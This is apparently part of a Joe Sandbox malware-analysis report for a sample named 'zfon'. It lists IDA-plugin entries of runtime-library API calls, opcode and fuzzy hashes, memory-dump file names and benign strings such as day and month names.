                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulxiswctype$DscaleStofltStoxflt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1993114911-0
                                                                                                                                                                            • Opcode ID: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                                                                                            • Instruction ID: ec1085f0e2176f9fc5cc576fdbab439f2823d29d4df618658044dbfb25ea8ede
                                                                                                                                                                            • Opcode Fuzzy Hash: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                                                                                            • Instruction Fuzzy Hash: 4261946AF085469AF710DEB2D4801FF2721AF54748F906635DE0D33799DE38E55A8B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$DscaleStofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1561094175-0
                                                                                                                                                                            • Opcode ID: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                                                                                            • Instruction ID: 63ebc04fa219a3339b65e7aca2eebcb7798d034b7323f8d2a1cd8d1bfb7715f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                                                                                            • Instruction Fuzzy Hash: E761B1AAF18A46D2E711DE71E5806BB6720FB84744FD06132EE4E67A85DE3CE5168F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$StofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3077680349-0
                                                                                                                                                                            • Opcode ID: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                                                                                            • Instruction ID: fcd8134d00c4df1de2882db58cd20c706f0fa3bc0f1861ab06f97333f34b1556
                                                                                                                                                                            • Opcode Fuzzy Hash: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A61E7AAF1C94282E711DE71E4405BFA760FB94754FD12132EE4D63689DE3CE55A8F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$StofltStoxfltXp_addhXp_mulh
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3654286868-0
                                                                                                                                                                            • Opcode ID: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                                                                                            • Instruction ID: 12089a7f36764781dbf51eabe9e507d22b55a3babe6f8cc5ac39e5a1f3ea98f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                                                                                            • Instruction Fuzzy Hash: BB61B3AAB1CA4282E711EF71E4406BFA760FB95744F906132EE4D73685DE3CD95A8F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            • Opcode ID: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                                                                                            • Instruction ID: a3792d8cd72dcac35b8f2b84fd521c908f183fe01858756f092e6af57066d925
                                                                                                                                                                            • Opcode Fuzzy Hash: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F1ADBAB08A829DE710DF74E4902FE37B1FB0434CB555036EA4D67AA9DE38D519CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                                                                            • API String ID: 511923668-4289949731
                                                                                                                                                                            • Opcode ID: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                                                                                            • Instruction ID: b68a9c0d7074602dedf18427ce84983eb5c549ef375f0432342f8fc2d5b2da0c
                                                                                                                                                                            • Opcode Fuzzy Hash: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                                                                                            • Instruction Fuzzy Hash: 86419562A4CE4381EE28EB39E544239E272EF58BD4FD44532CA5D07795EF3DE4898360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xbad_alloc@std@@memcpy
                                                                                                                                                                            • String ID: scene
                                                                                                                                                                            • API String ID: 1435337725-3648647130
                                                                                                                                                                            • Opcode ID: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                                                                                            • Instruction ID: 795f618c89f54aedaca60269a008c80f4d21b04cac469b0c361941c8c90c060b
                                                                                                                                                                            • Opcode Fuzzy Hash: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 5241A422B0964750FE38AB39E444378A2A2EB44BA0FD00634DA6D077DADF7CA4918361
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FEAE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B5FD9E
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B5FE1C
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B5FE68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: callocfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1633071956-35662545
                                                                                                                                                                            • Opcode ID: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                                                                                            • Instruction ID: 8caf72258eed377c64a604ac87a51ffa8267cb72a3f0dd5ee7026ce659032962
                                                                                                                                                                            • Opcode Fuzzy Hash: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                                                                                            • Instruction Fuzzy Hash: F641A1AAB05B8185EB118F31D90876AB7A1BB18FD0F486178DE5D1738ADF3CE445CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$cef_string_map_allocmallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 871575421-0
                                                                                                                                                                            • Opcode ID: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                                                                                            • Instruction ID: c1960cd7b6fb5947cb6ae262c6afc6c2c52a031095666da1b4f94e34f6e8d5e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9AD18B63B09A4685EF24EB79D4843ACA3B2FB44B98F848936DE4D53796DF38D445C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString__crt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1548350897-0
                                                                                                                                                                            • Opcode ID: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                                                                                            • Instruction ID: 35aa30ddf307c412837b8e62214b95d0a6947302dc00e1b0a30b5607e0188f21
                                                                                                                                                                            • Opcode Fuzzy Hash: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                                                                                            • Instruction Fuzzy Hash: 2791A1FAA0978285FB318F30D45027B6791AF05BA4F886231D95D267D5DF3CE465CA00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            • Opcode ID: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                                                                                            • Instruction ID: ba35755fe06d528bfeae0f80c4953cba0ee46bbd3f4ede458cc4f0d071e5b327
                                                                                                                                                                            • Opcode Fuzzy Hash: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                                                                                            • Instruction Fuzzy Hash: FC91B933B48A4789EF24EB75E4443BDA3B2AB85B94FC54831CA4D17794DF3CA4468320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 4223619315-393685449
                                                                                                                                                                            • Opcode ID: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                                                                                            • Instruction ID: 3f7e9310c71b61b75714efbaeb8d1d6b782fb43ffccf0ff63ef92f2a5eeb4cec
                                                                                                                                                                            • Opcode Fuzzy Hash: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                                                                                            • Instruction Fuzzy Hash: 27D191BAA0874286EB109F75D4403AE77A0FF45B98F216235EE4D67B65DF38E091CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                                            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                            • API String ID: 3676697650-3207858774
                                                                                                                                                                            • Opcode ID: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                                                                                            • Instruction ID: e945679da0fca1c614073580ad70839967a9f6079199877a77c512b75ab0d6e2
                                                                                                                                                                            • Opcode Fuzzy Hash: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D9194BAA08A4699FB11CF30D4903BA37A1AF48744F656135EA4D237A5DF3CE509CB50
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C2F5
